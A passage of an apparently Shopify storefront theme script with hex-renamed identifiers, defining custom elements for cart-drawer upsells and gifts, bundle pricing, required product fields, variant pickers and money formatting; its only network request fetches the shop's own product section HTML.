  }
  ["getUpdateRequired"]() {
    const _0x4adb73 = this.cartDrawer.querySelector('.cart-item--product-' + this.dataset.handle);
    let _0x58eac9 = false;
    if (_0x4adb73 && this.dataset.selected === "false") {
      _0x58eac9 = true;
    } else if (!_0x4adb73 && this.dataset.selected === "true") {
      _0x58eac9 = true;
    }
    return _0x58eac9;
  }
}
customElements.define("cart-drawer-upsell", CartDrawerUpsell);
function displayPrices(_0x21106a, _0x29fdbb, _0x235fbf, _0x5747ac, _0x5e3365) {
  if (!_0x5e3365) {
    return;
  }
  if (_0x21106a && _0x235fbf) {
    var _0x5a19e0 = formatMoney(_0x21106a, _0x5e3365);
    _0x235fbf.innerHTML = _0x5a19e0;
  }
  if (_0x29fdbb && _0x5747ac) {
    var _0x2be6be = formatMoney(_0x29fdbb, _0x5e3365);
    _0x5747ac.innerHTML = _0x2be6be;
    if (_0x29fdbb > _0x21106a) {
      _0x5747ac.classList.remove("hidden");
    } else {
      _0x5747ac.classList.add("hidden");
    }
  }
}
function initTrapFocus() {
  isIe = false;
  if (document.querySelector("footer") && document.querySelector("footer").dataset.type === null) {
    return false;
  }
  return true;
}
function formatMoney(_0x2a0486, _0x13c2ff, _0x11e9dd = false) {
  if (typeof _0x2a0486 == "string") {
    _0x2a0486 = _0x2a0486.replace('.', '');
  }
  var _0x3713bf = '';
  var _0x1caefe = /\{\{\s*(\w+)\s*\}\}/;
  function _0x2785c6(_0x4b3cac, _0x19d088, _0x5af1c2, _0x4cc348) {
    _0x19d088 = typeof _0x19d088 == 'undefined' ? 0x2 : _0x19d088;
    _0x5af1c2 = typeof _0x5af1c2 == 'undefined' ? ',' : _0x5af1c2;
    _0x4cc348 = typeof _0x4cc348 == 'undefined' ? '.' : _0x4cc348;
    if (isNaN(_0x4b3cac) || _0x4b3cac == null) {
      return 0x0;
    }
    _0x4b3cac = (_0x4b3cac / 0x64).toFixed(_0x19d088);
    var _0x218e3b = _0x4b3cac.split('.');
    var _0x3b3f2d = _0x218e3b[0x0].replace(/(\d)(?=(\d\d\d)+(?!\d))/g, '$1' + _0x5af1c2);
    var _0x44ef46 = _0x218e3b[0x1] ? _0x4cc348 + _0x218e3b[0x1] : '';
    if (_0x11e9dd && _0x44ef46 === _0x4cc348 + '00') {
      _0x44ef46 = '';
    }
    return _0x3b3f2d + _0x44ef46;
  }
  switch (_0x13c2ff.match(_0x1caefe)[0x1]) {
    case "amount":
      _0x3713bf = _0x2785c6(_0x2a0486, 0x2);
      break;
    case "amount_no_decimals":
      _0x3713bf = _0x2785c6(_0x2a0486, 0x0);
      break;
    case "amount_with_comma_separator":
      _0x3713bf = _0x2785c6(_0x2a0486, 0x2, '.', ',');
      break;
    case "amount_no_decimals_with_comma_separator":
      _0x3713bf = _0x2785c6(_0x2a0486, 0x0, '.', ',');
      break;
  }
  return _0x13c2ff.replace(_0x1caefe, _0x3713bf);
}
class CartDrawerGift extends CartDrawerUpsell {
  constructor() {
    super();
    this.saveLocalStorage = this.dataset.saveLocalStorage === 'true';
    if (this.saveLocalStorage) {
      this.storeLocalStorageData();
    }
  }
  ['storeLocalStorageData']() {
    if (!this.dataset.handle || !this.dataset.id || !this.dataset.mainProduct || !this.dataset.requirement || !this.dataset.type) {
      return;
    }
    updateGiftGoalInStorage({
      'giftHandle': this.dataset.handle,
      'giftVariantId': this.dataset.id,
      'unlockType': this.dataset.type,
      'unlockRequirement': Number(this.dataset.requirement),
      'unlockTarget': this.dataset.mainProduct
    });
  }
}
customElements.define("cart-drawer-gift", CartDrawerGift);
function initToggleUpsells() {
  const _0x5de89a = document.querySelector("cart-drawer");
  if (_0x5de89a) {
    _0x5de89a.querySelectorAll("cart-drawer-upsell[data-toggle=\"true\"], cart-drawer-gift").forEach(_0x308fa4 => {
      if (_0x308fa4.addRemoveFromCart) {
        _0x308fa4.addRemoveFromCart();
      }
    });
  }
}
initToggleUpsells();
class MainBundleOffer extends HTMLElement {
  constructor() {
    super();
    this.offerItems = this.querySelectorAll(".main-offer-item");
    this.updatePrices = this.dataset.updatePrices === 'true';
    if (this.updatePrices) {
      this.priceSpan = this.querySelector('.bundle-deals__total-price-js');
      this.comparePriceSpan = this.querySelector(".bundle-deals__total-compare-price-js");
      this.percentageLeft = parseFloat(this.dataset.percentageLeft);
      this.fixedDiscount = parseFloat(this.dataset.fixedDiscount);
      this.moneyFormat = this.dataset.moneyFormat;
    }
  }
  ['updateTotalPrices']() {
    if (!this.updatePrices) {
      return;
    }
    var _0x358fdf = 0x0;
    var _0x31467a = 0x0;
    for (let _0x3dfb02 = 0x0; _0x3dfb02 < this.offerItems.length; _0x3dfb02++) {
      _0x358fdf += parseInt(this.offerItems[_0x3dfb02].price);
      _0x31467a += parseInt(this.offerItems[_0x3dfb02].comparePrice);
    }
    _0x358fdf = _0x358fdf * this.percentageLeft - this.fixedDiscount;
    displayPrices(_0x358fdf, _0x31467a, this.priceSpan, this.comparePriceSpan, this.moneyFormat);
  }
}
customElements.define("main-bundle-offer", MainBundleOffer);
class CustomProductField extends HTMLElement {
  constructor() {
    super();
  }
  ['connectedCallback']() {
    this.fieldName = this.dataset.name;
    this.input = this.querySelector("[type=\"text\"], [type=\"number\"], textarea");
    this.inputRadios = this.querySelectorAll("[type=\"radio\"]");
    this.select = this.querySelector(".select__select");
    this.productForm = document.getElementById("product-form-" + this.dataset.section);
    this.prevValue = this.dataset.defaultValue;
    this.isRequired = this.dataset.required === 'true';
    this.isText = true;
    this.notMain = this.dataset.notMain === "true";
    if (this.dataset.type === "select" || this.dataset.type === "pills") {
      this.isText = false;
    }
    this.createInputs();
    if (this.isRequired && this.isText) {
      this.isValid = true;
      this.atcButtons = this.notMain ? document.querySelectorAll(".featured-product-atc-" + this.dataset.section) : document.querySelectorAll(".main-product-atc");
      this.mainAtcButton = this.productForm.querySelector('#ProductSubmitButton-' + this.dataset.section);
      this.mainAtcBtnLabel = this.mainAtcButton.querySelector(".main-atc__label");
      this.mainAtcBtnError = this.mainAtcButton.querySelector(".main-atc__error");
      this.atcErrorMsg = this.dataset.atcErrorMsg;
      this.mainAtcButton.dataset.requiredFields = parseInt(this.mainAtcButton.dataset.requiredFields) + 0x1;
      console.log(this.mainAtcBtnError);
      if (this.mainAtcBtnError) {
        this.mainAtcBtnError.innerHTML = this.atcErrorMsg;
      }
      this.applyStickyAtcError = this.dataset.applyStickyAtcError === "true";
      this.stickyAtcButton = document.querySelector('#sticky-atc-' + this.dataset.section);
      if (this.applyStickyAtcError && this.stickyAtcButton) {
        this.stickyAtcBtnLabel = this.stickyAtcButton.querySelector(".sticky-atc__label");
        this.stickyAtcBtnError = this.stickyAtcButton.querySelector(".sticky-atc__error");
        console.log(this.stickyAtcBtnError);
        if (this.stickyAtcBtnError) {
          this.stickyAtcBtnError.innerHTML = this.atcErrorMsg;
        }
      }
      this.validateValue(this.prevValue, null);
    }
    if (this.input) {
      this.input.addEventListener("input", this.handleChange.bind(this));
    }
    this.inputRadios.forEach(_0x57c4b3 => {
      _0x57c4b3.addEventListener('input', this.handleChange.bind(this));
    });
    if (this.select) {
      this.select.addEventListener("change", this.handleChange.bind(this));
    }
  }
  ["handleChange"](_0x304e02) {
    const _0x3e1ffa = _0x304e02.target.value.trim();
    if (_0x304e02.target.checkValidity()) {
      this.prevValue = _0x3e1ffa;
    } else {
      _0x304e02.target.value = this.prevValue;
      return;
    }
    this.dataset.value = _0x3e1ffa;
    this.productFormInput.value = _0x3e1ffa;
    if (this.isRequired && this.isText) {
      this.validateValue(_0x3e1ffa, _0x304e02.target);
    }
  }
  ["validateValue"](_0x2a15b6, _0x7498f8) {
    const _0x249364 = !!(_0x2a15b6.length > 0x0);
    if (_0x249364 === this.isValid) {
      return;
    }
    this.isValid = _0x249364;
    if (_0x7498f8) {
      if (this.isValid) {
        _0x7498f8.classList.remove("input--error");
        this.mainAtcButton.dataset.validFields = parseInt(this.mainAtcButton.dataset.validFields) + 0x1;
      } else {
        _0x7498f8.classList.add("input--error");
        this.mainAtcButton.dataset.validFields = parseInt(this.mainAtcButton.dataset.validFields) - 0x1;
      }
    }
    const _0x319caf = this.mainAtcButton.dataset.validFields === this.mainAtcButton.dataset.requiredFields;
    const _0x3bd0ee = this.mainAtcButton.dataset.unavailable === "true";
    this.atcButtons.forEach(_0x454030 => {
      if (_0x319caf && !_0x3bd0ee) {
        _0x454030.removeAttribute('disabled');
      } else {
        _0x454030.setAttribute("disabled", '');
      }
    });
    if (this.atcErrorMsg.length === 0x0) {
      return;
    }
    if (_0x319caf) {
      this.mainAtcBtnLabel.style.display = '';
      this.mainAtcBtnError.style.display = "none";
      if (this.applyStickyAtcError && this.stickyAtcButton) {
        this.stickyAtcBtnLabel.style.display = '';
        this.stickyAtcBtnError.style.display = "none";
      }
    } else {
      this.mainAtcBtnLabel.style.display = "none";
      this.mainAtcBtnError.style.display = '';
      if (this.applyStickyAtcError && this.stickyAtcButton) {
        this.stickyAtcBtnLabel.style.display = "none";
        this.stickyAtcBtnError.style.display = '';
      }
    }
  }
  ['createInputs']() {
    this.productFormInput = document.createElement('input');
    this.productFormInput.setAttribute('type', "hidden");
    this.productFormInput.setAttribute("name", 'properties[' + this.fieldName + ']');
    this.productFormInput.value = this.dataset.defaultValue;
    this.productFormInput.classList.add('shrine-property-input');
    this.productForm.appendChild(this.productFormInput);
  }
}
customElements.define("custom-product-field", CustomProductField);
function playMedia() {
  if (!serial) {
    serial = document.currentScript.dataset.animationsType || '';
  }
}
class VariantSelects extends HTMLElement {
  constructor() {
    super();
    this.secondarySelectSelector = 'StickyAtcVariantPicker-';
    this.secondarySelect = document.getElementById('' + this.secondarySelectSelector + this.dataset.section);
    this.isSecondary = false;
    this.QuantityBreaks = document.getElementById('quantity-breaks-' + this.dataset.section);
    this.hasQuantityBreaksPicker = this.dataset.hasQuantityBreaksPicker === "true";
    this.prependMedia = this.dataset.disablePrepend != "true";
    this.filtering = this.dataset.hasFiltering === "true";
    this.skipNonExistent = this.dataset.skipNonExistent === "true";
    this.skipUnavailable = this.dataset.skipUnavailable === 'true';
    if (this.hasQuantityBreaksPicker) {
      this.quantityBreaksPickerStyle = this.dataset.quantityBreaksPickerStyle;
      this.quantityBreaksPickerDisplayedImages = this.dataset.quantityBreaksPickerDisplayedImages;
    }
    this.addEventListener("change", this.onVariantChange);
  }
  ['onVariantChange']() {
    this.updateOptions();
    this.updateMasterId();
    this.toggleAddButton(true, '', false);
    this.updatePickupAvailability();
    this.removeErrorMessage();
    this.updateVariantStatuses();
    if (!this.currentVariant) {
      this.toggleAddButton(true, '', true);
      if (this.skipNonExistent && findAvailableVariant(this, this.options, true, true, this.skipUnavailable)) {
        return;
      }
      this.setUnavailable();
    } else {
      if (this.skipUnavailable && !this.currentVariant.available) {
        if (findAvailableVariant(this, this.options, true, true, true)) {
          return;
        }
      }
      this.updateMedia();
      this.updateURL();
      this.updateVariantInput();
      this.renderProductInfo();
      this.updateShareUrl();
    }
  }
  ["updateOptions"]() {
    const _0x1e5e86 = [];
    this.querySelectorAll(".product-form__input").forEach(_0x34a7d6 => {
      let _0x550d4d;
      const _0x52e4ce = _0x34a7d6.querySelector(".product-form__input__type").dataset.type;
      if (_0x52e4ce == "dropdown" || _0x52e4ce == "dropdwon") {
        _0x550d4d = _0x34a7d6.querySelector('.select__select').value;
      } else {
        _0x550d4d = _0x34a7d6.querySelector("input[type=\"radio\"]:checked").value;
      }
      _0x1e5e86.push(_0x550d4d);
    });
    this.options = _0x1e5e86;
  }
  ['updateMasterId']() {
    this.currentVariant = this.getVariantData().find(_0x365ab4 => {
      return !_0x365ab4.options.map((_0x1cba15, _0x24d684) => {
        return this.options[_0x24d684] === _0x1cba15;
      }).includes(false);
    });
  }
  ["updateMedia"]() {
    if (!this.currentVariant) {
      return;
    }
    if (!this.currentVariant.featured_media) {
      return;
    }
    const _0x43ba9d = document.querySelectorAll("[id^=\"MediaGallery-" + this.dataset.section + "\"]");
    _0x43ba9d.forEach(_0x36703e => _0x36703e.setActiveMedia(this.dataset.section + '-' + this.currentVariant.featured_media.id, this.prependMedia, this.filtering, this.currentVariant));
    const _0xd1c2bc = document.querySelector("#ProductModal-" + this.dataset.section + " .product-media-modal__content");
    if (!_0xd1c2bc) {
      return;
    }
    const _0x126969 = _0xd1c2bc.querySelector("[data-media-id=\"" + this.currentVariant.featured_media.id + "\"]");
    _0xd1c2bc.prepend(_0x126969);
  }
  ['updateURL']() {
    if (!this.currentVariant || this.dataset.updateUrl === 'false') {
      return;
    }
    window.history.replaceState({}, '', this.dataset.url + "?variant=" + this.currentVariant.id);
  }
  ["updateShareUrl"]() {
    const _0xbe3aa3 = document.getElementById('Share-' + this.dataset.section);
    if (!_0xbe3aa3 || !_0xbe3aa3.updateUrl) {
      return;
    }
    _0xbe3aa3.updateUrl('' + window.shopUrl + this.dataset.url + "?variant=" + this.currentVariant.id);
  }
  ['updateVariantInput']() {
    const _0x5892f0 = document.querySelectorAll('#product-form-' + this.dataset.section + ", #product-form-installment-" + this.dataset.section);
    _0x5892f0.forEach(_0x2a0da6 => {
      const _0x1dd296 = _0x2a0da6.querySelector("input[name=\"id\"]");
      _0x1dd296.value = this.currentVariant.id;
      _0x1dd296.dispatchEvent(new Event('change', {
        'bubbles': true
      }));
    });
  }
  ["updateVariantStatuses"]() {
    const _0x5d215a = this.variantData.filter(_0xf2e405 => this.querySelector(":checked").value === _0xf2e405.option1);
    let _0x5e483d;
    if (this.isSecondary && this.secondarySelect) {
      _0x5e483d = [...this.secondarySelect.querySelectorAll('.product-form__input')];
    } else {
      _0x5e483d = [...this.querySelectorAll(".product-form__input")];
    }
    _0x5e483d.forEach((_0x181db8, _0x80af82) => {
      if (_0x80af82 === 0x0) {
        return;
      }
      const _0x3f31fc = [..._0x181db8.querySelectorAll("input[type=\"radio\"], .select__select option")];
      const _0x4ca8d2 = _0x5e483d[_0x80af82 - 0x1].querySelector(":checked").value;
      const _0x2b38f5 = _0x5d215a.filter(_0x56d392 => _0x56d392.available && _0x56d392["option" + _0x80af82] === _0x4ca8d2).map(_0x1d46ad => _0x1d46ad["option" + (_0x80af82 + 0x1)]);
      const _0x1b0f7b = _0x5d215a.filter(_0x4d44d5 => _0x4d44d5["option" + _0x80af82] === _0x4ca8d2).map(_0x84f542 => _0x84f542['option' + (_0x80af82 + 0x1)]);
      this.setInputAvailability(_0x3f31fc, _0x2b38f5, _0x1b0f7b, this.skipNonExistent, this.skipUnavailable);
    });
  }
  ['setInputAvailability'](_0x5b94bb, _0xb73ac9, _0x15b8da, _0x3e2b39 = false, _0x3aff0f = false) {
    _0x5b94bb.forEach(_0x594492 => {
      _0x594492.classList.remove("unavailable", "non-existent", "disabled");
      _0x594492.removeAttribute('disabled');
      _0x594492.removeAttribute("hidden");
      const _0x58698c = _0x594492.getAttribute('value');
      let _0x1a8382 = null;
      if (_0x594492.dataset.swatch === "true") {
        _0x1a8382 = _0x594492.closest(".color-swatch");
      }
      if (_0x1a8382) {
        _0x1a8382.classList.remove("unavailable", 'non-existent', "disabled");
      }
      if (_0x15b8da.includes(_0x58698c)) {
        if (_0xb73ac9.includes(_0x58698c)) {
          if (_0x594492.nodeName === "OPTION") {
            _0x594492.innerText = _0x58698c;
          } else {
            _0x594492.classList.remove("disabled");
            if (_0x1a8382) {
              _0x1a8382.classList.remove('disabled');
            }
          }
        } else {
          if (_0x594492.nodeName === "OPTION") {
            _0x594492.innerText = window.variantStrings.unavailable_with_option.replace('[value]', _0x58698c);
            _0x594492.classList.add("unavailable");
            if (_0x3aff0f) {
              _0x594492.setAttribute('disabled', '');
              _0x594492.setAttribute("hidden", '');
            }
          } else {
            _0x594492.classList.add("disabled", "unavailable");
            if (_0x1a8382) {
              _0x1a8382.classList.add('disabled', "unavailable");
            }
          }
        }
      } else {
        if (_0x594492.nodeName === "OPTION") {
          _0x594492.innerText = window.variantStrings.unavailable_with_option.replace("[value]", _0x58698c);
          _0x594492.classList.add("non-existent");
          if (_0x3e2b39) {
            _0x594492.setAttribute("disabled", '');
            _0x594492.setAttribute("hidden", '');
          }
        } else {
          _0x594492.classList.add("disabled", "non-existent");
          if (_0x1a8382) {
            _0x1a8382.classList.add("disabled", "non-existent");
          }
        }
      }
    });
  }
  ['updatePickupAvailability']() {
    const _0xa775c8 = document.querySelector("pickup-availability");
    if (!_0xa775c8) {
      return;
    }
    if (this.currentVariant && this.currentVariant.available) {
      if (_0xa775c8.fetchAvailability) {
        _0xa775c8.fetchAvailability(this.currentVariant.id);
      }
    } else {
      _0xa775c8.removeAttribute("available");
      _0xa775c8.innerHTML = '';
    }
  }
  ["removeErrorMessage"]() {
    const _0x489429 = this.closest("section");
    if (!_0x489429) {
      return;
    }
    const _0x4bf16d = _0x489429.querySelector('product-form');
    if (_0x4bf16d) {
      _0x4bf16d.handleErrorMessage();
    }
  }
  ["renderProductInfo"]() {
    const _0x57f26e = this.currentVariant.id;
    const _0x235ae6 = this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section;
    fetch(this.dataset.url + "?variant=" + _0x57f26e + "&section_id=" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section)).then(_0x57e5f2 => _0x57e5f2.text()).then(_0x1db31c => {
      if (this.currentVariant.id !== _0x57f26e) {
        return;
      }
      const _0x50f7fb = new DOMParser().parseFromString(_0x1db31c, 'text/html');
      const _0x5e0c72 = document.getElementById("price-" + this.dataset.section);
      const _0x568d89 = _0x50f7fb.getElementById("price-" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
      const _0xe43b41 = document.getElementById("sticky-atc-separate-price-" + this.dataset.section);
      const _0x5f4078 = _0x50f7fb.getElementById("sticky-atc-separate-price-" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
      const _0x340b22 = document.getElementById('sticky-atc-price-' + this.dataset.section);
      const _0x3447b2 = _0x50f7fb.getElementById("sticky-atc-price-" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
      const _0x25a0f8 = document.getElementById("sticky-atc-image-" + this.dataset.section);
      if (_0x25a0f8 && this.currentVariant.featured_image) {
        _0x25a0f8.src = this.currentVariant.featured_image.src;
      }
      const _0x2b41e6 = document.getElementById('main-atc-price-' + this.dataset.section);
      const _0x3d661a = _0x50f7fb.getElementById('main-atc-price-' + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
      const _0x21ce8a = document.querySelectorAll("[id^=\"custom-label-" + this.dataset.section + "\"]");
      const _0x31f161 = _0x50f7fb.querySelectorAll("[id^=\"custom-label-" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section) + "\"]");
      const _0x37314b = _0x50f7fb.getElementById("Sku-" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
      const _0x455fe6 = document.getElementById('Sku-' + this.dataset.section);
      const _0x587950 = _0x50f7fb.getElementById("Inventory-" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
      const _0x16810d = document.getElementById("Inventory-" + this.dataset.section);
      if (_0x5e0c72 && _0x568d89) {
        _0x5e0c72.innerHTML = _0x568d89.innerHTML;
      }
      if (_0xe43b41 && _0x5f4078) {
        _0xe43b41.innerHTML = _0x5f4078.innerHTML;
      }
      if (_0x340b22 && _0x3447b2) {
        _0x340b22.innerHTML = _0x3447b2.innerHTML;
      }
      if (_0x3d661a && _0x2b41e6) {
        _0x2b41e6.innerHTML = _0x3d661a.innerHTML;
      }
      if (_0x21ce8a && _0x31f161) {
        for (var _0x318ebe = 0x0; _0x318ebe < _0x21ce8a.length; _0x318ebe++) {
          _0x21ce8a[_0x318ebe].innerHTML = _0x31f161[_0x318ebe].innerHTML;
        }
      }
      if (_0x587950 && _0x16810d) {
        _0x16810d.innerHTML = _0x587950.innerHTML;
      }
      if (_0x37314b && _0x455fe6) {
        _0x455fe6.innerHTML = _0x37314b.innerHTML;
        _0x455fe6.classList.toggle("visibility-hidden", _0x37314b.classList.contains('visibility-hidden'));
      }
      if (this.QuantityBreaks) {
        const _0x35a637 = _0x50f7fb.getElementById('quantity-breaks-' + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
        const _0x576d5b = this.QuantityBreaks.querySelectorAll(".dynamic-price");
        const _0x217d67 = _0x35a637.querySelectorAll('.dynamic-price');
        for (let _0x33a919 = 0x0; _0x33a919 < _0x576d5b.length; _0x33a919++) {
          _0x576d5b[_0x33a919].innerHTML = _0x217d67[_0x33a919].innerHTML;
        }
        if (this.QuantityBreaks.hasVariants) {
          this.QuantityBreaks.variantSelects.forEach(_0x41b94e => {
            _0x41b94e.dataset.selectedId = this.currentVariant.id;
          });
          const _0x35bc89 = this.QuantityBreaks.querySelectorAll(".quantity-break__variant-select");
          const _0x1058dc = _0x35a637.querySelectorAll(".quantity-break__variant-select");
          for (let _0x1f91ab = 0x0; _0x1f91ab < _0x35bc89.length; _0x1f91ab++) {
            _0x35bc89[_0x1f91ab].innerHTML = _0x1058dc[_0x1f91ab].innerHTML;
          }
          this.QuantityBreaks.initVariants();
        }
        ;
        this.QuantityBreaks.querySelectorAll(".quantity-break__selector-item__image img").forEach(_0x4ff697 => {
          _0x4ff697.src = this.currentVariant.featured_image.src;
        });
        if (this.QuantityBreaks.updatePdpPrices) {
          this.QuantityBreaks.dataset.basePrice = _0x35a637.dataset.basePrice;
          this.QuantityBreaks.labels.forEach(_0x4a48a5 => {
            _0x4a48a5.dataset.baseComparePrice = _0x35a637.querySelector("label[data-input=\"" + _0x4a48a5.dataset.input + "\"]").dataset.baseComparePrice;
          });
          this.QuantityBreaks.initOfferPrices(true);
          this.QuantityBreaks.updateInnerPrices();
        }
      }
      const _0x5e7022 = document.getElementById('SubscriptionWidget-' + this.dataset.section);
      const _0x25b17f = _0x50f7fb.getElementById('SubscriptionWidget-' + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
      if (_0x5e7022) {
        if (!_0x25b17f) {
          _0x5e7022.classList.add('hidden');
        } else {
          _0x5e7022.dataset.basePrice = _0x25b17f.dataset.basePrice || '';
          _0x5e7022.dataset.baseComparePrice = _0x25b17f.dataset.baseComparePrice || '';
          const _0x1adfb4 = (_0x5e7022.dataset.firstSellingPlanId || '') !== (_0x25b17f.dataset.firstSellingPlanId || '');
          if (_0x1adfb4 && typeof _0x5e7022.hydrateFromExternalHTML === "function") {
            _0x5e7022.hydrateFromExternalHTML(_0x25b17f);
          } else {
            const _0x2ec236 = _0x5e7022.querySelectorAll(".one-time-price-update");
            const _0x40a360 = _0x25b17f.querySelectorAll(".one-time-price-update");
            for (let _0x1b02b3 = 0x0; _0x1b02b3 < _0x2ec236.length; _0x1b02b3++) {
              _0x2ec236[_0x1b02b3].innerHTML = _0x40a360[_0x1b02b3].innerHTML;
            }
            if (_0x5e7022.updatePrices) {
              _0x5e7022.updateAllPrices();
            }
          }
        }
      }
      if (this.hasQuantityBreaksPicker) {
        const _0x347a25 = _0x50f7fb.getElementById("variant-selects-" + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
        const _0x296cad = this.querySelectorAll(".dynamic-price");
        const _0x29e839 = _0x347a25.querySelectorAll(".dynamic-price");
        for (let _0x4c0180 = 0x0; _0x4c0180 < _0x296cad.length; _0x4c0180++) {
          _0x296cad[_0x4c0180].innerHTML = _0x29e839[_0x4c0180].innerHTML;
        }
        if (this.quantityBreaksPickerStyle === 'vertical' && this.quantityBreaksPickerDisplayedImages === "variant_images") {
          const _0x1667f6 = this.querySelectorAll(".quantity-break__image img");
          const _0x31d1b8 = _0x347a25.querySelectorAll(".quantity-break__image img");
          for (let _0x33aaee = 0x0; _0x33aaee < _0x1667f6.length; _0x33aaee++) {
            _0x1667f6[_0x33aaee].src = _0x31d1b8[_0x33aaee].src;
          }
        }
      }
      if (this.secondarySelect) {
        const _0x25241f = _0x50f7fb.getElementById('' + this.secondarySelectSelector + (this.dataset.originalSection ? this.dataset.originalSection : this.dataset.section));
        if (_0x25241f) {
          this.secondarySelect.innerHTML = _0x25241f.innerHTML;
        }
      }
      const _0x1534fc = document.getElementById("price-" + this.dataset.section);
      if (_0x1534fc) {
        _0x1534fc.classList.remove("visibility-hidden");
      }
      this.dataset.options = this.currentVariant.options.join(',');
      if (_0x16810d) {
        _0x16810d.classList.toggle("visibility-hidden", _0x587950.innerText === '');
      }
      const _0x4dd3dc = _0x50f7fb.getElementById("ProductSubmitButton-" + _0x235ae6);
      this.toggleAddButton(_0x4dd3dc ? _0x4dd3dc.hasAttribute("disabled") : true, window.variantStrings.soldOut);
      publish('variant-change', {
        'data': {
          'sectionId': _0x235ae6,
          'html': _0x50f7fb,
          'variant': this.currentVariant
        }
      });
    });
  }
  ["toggleAddButton"](_0x279073 = true, _0x4c54a1, _0x2961a8 = true) {
    const _0x4f0dc4 = document.getElementById('product-form-' + this.dataset.section);
    if (!_0x4f0dc4) {
      return;
    }
    const _0x2c59b7 = _0x4f0dc4.querySelector("[name=\"add\"]");
    if (!_0x2c59b7) {
      return;
    }
    const _0x5e5c20 = document.querySelectorAll(".main-product-atc");
    var _0xe4382f = _0x4f0dc4.querySelector('.main-atc__label__text');
    if (!_0xe4382f) {
      _0xe4382f = _0x4f0dc4.querySelector(".main-atc__label");
    }
    const _0x1d348f = _0x4f0dc4.querySelector('.main-atc-price');
    const _0x9cafaa = document.querySelector(".sticky-atc__add_button");
    let _0x50cc70 = null;
    let _0x56dd76 = null;
    if (_0x9cafaa) {
      _0x50cc70 = _0x9cafaa.querySelector(".sticky-atc__label__text");
      _0x56dd76 = _0x9cafaa.querySelector(".sticky-atc__button-price");
    }
    if (_0x279073) {
      _0x2c59b7.setAttribute("disabled", "disabled");
      _0x2c59b7.setAttribute("data-unavailable", 'true');
      if (_0x4c54a1 && _0xe4382f) {
        _0xe4382f.textContent = _0x4c54a1;
      }
      if (_0x50cc70 && _0x9cafaa.dataset.label) {
        _0x50cc70.textContent = _0x4c54a1;
      }
      _0x5e5c20.forEach(_0x3989ef => {
        _0x3989ef.setAttribute("disabled", "disabled");
      });
      if (_0x1d348f) {
        _0x1d348f.classList.add("hidden");
      }
      if (_0x56dd76) {
        _0x56dd76.classList.add("hidden");
      }
    } else {
      _0x2c59b7.setAttribute("data-unavailable", "false");
      const _0x304890 = _0x2c59b7.dataset.customLabel ?? window.variantStrings.addToCart;
      if (_0xe4382f) {
        _0xe4382f.textContent = _0x304890;
      }
      if (_0x1d348f) {
        _0x1d348f.classList.remove('hidden');
      }
      if (_0x50cc70 && _0x9cafaa.dataset.label) {
        _0x50cc70.textContent = _0x9cafaa.dataset.label;
      }
      if (_0x56dd76) {
        _0x56dd76.classList.remove("hidden");
      }
      if (_0x2c59b7.dataset.requiredFields === _0x2c59b7.dataset.validFields) {
        _0x2c59b7.removeAttribute("disabled");
        _0x5e5c20.forEach(_0x1ce650 => {
          _0x1ce650.removeAttribute('disabled');
        });
      }
    }
    if (!_0x2961a8) {
      return;
    }
  }
  ["setUnavailable"]() {
    const _0xd61017 = document.getElementById("product-form-" + this.dataset.section);
    if (!_0xd61017) {
      return;
    }
    const _0xfcefb9 = _0xd61017.querySelector("[name=\"add\"]");
    var _0x21cdc4 = _0xd61017.querySelector(".main-atc__label__text");
    if (!_0x21cdc4) {
      _0x21cdc4 = _0xd61017.querySelector('.main-atc__label');
    }
    const _0x1ed07d = document.getElementById('price-' + this.dataset.section);
    const _0x27d185 = document.getElementById("Inventory-" + this.dataset.section);
    const _0x51756c = document.getElementById("Sku-" + this.dataset.section);
    if (!_0xfcefb9) {
      return;
    }
    if (_0x21cdc4) {
      _0x21cdc4.textContent = window.variantStrings.unavailable;
    }
    if (_0x1ed07d) {
      _0x1ed07d.classList.add("visibility-hidden");
    }
    if (_0x27d185) {
      _0x27d185.classList.add("visibility-hidden");
    }
    if (_0x51756c) {
      _0x51756c.classList.add("visibility-hidden");
    }
  }
  ["getVariantData"]() {
    this.variantData = this.variantData || JSON.parse(this.querySelector("[type=\"application/json\"]").textContent);
    return this.variantData;
  }
}
customElements.define("variant-selects", VariantSelects);
class SecondaryVariantSelect extends VariantSelects {
  constructor() {
    super();
    this.secondarySelectSelector = "variant-selects-";
    this.secondarySelect = document.getElementById('' + this.secondarySelectSelector + this.dataset.section);
    this.isSecondary = true;
  }
  ['updateOptions']() {
    this.options = this.querySelector("select").value.split(',');
  }
}
customElements.define("secondary-variant-select", SecondaryVariantSelect);
class SecondaryVariantSelectSeparate extends VariantSelects {
  constructor() {
    super();
    this.secondarySelectSelector = "variant-selects-";
    this.secondarySelect = document.getElementById('' + this.secondarySelectSelector + this.dataset.section);
    this.isSecondary = true;
  }
}
customElements.define('secondary-variant-select-separate', SecondaryVariantSelectSeparate);
class CardVariantSelects extends VariantSelects {
  constructor() {
    super();
    this.quickAddSubmit = document.getElementById(this.dataset.section + "-submit");
  }
  ['onVariantChange']() {
    this.updateOptions();
    this.updateMasterId();
    this.toggleAddButton(true, '', false);
    this.updateVariantStatuses();
    if (!this.currentVariant) {
      this.toggleAddButton(true, '', true);
      this.setUnavailable();
    } else {
      this.updateMedia();
      this.updateVariantInput();
      this.updateQuickAddUrl();
      this.toggleAddButton(!this.currentVariant.available, window.variantStrings.soldOut);
    }
  }
  ["updateMedia"]() {
    if (!this.currentVariant || !this.currentVariant.featured_media) {
      return;
    }
    const _0x5edb42 = document.getElementById(this.dataset.section + "-image");
    if (!_0x5edb42) {
      return;
    }
    const _0x520ad1 = this.currentVariant.featured_media.preview_image;
    const _0x85819f = _0x520ad1.src.split('?')[0x0];
    const _0x1950cf = [0xa5, 0x168, 0x215, 0x2d0, 0x3ac, 0x42a];
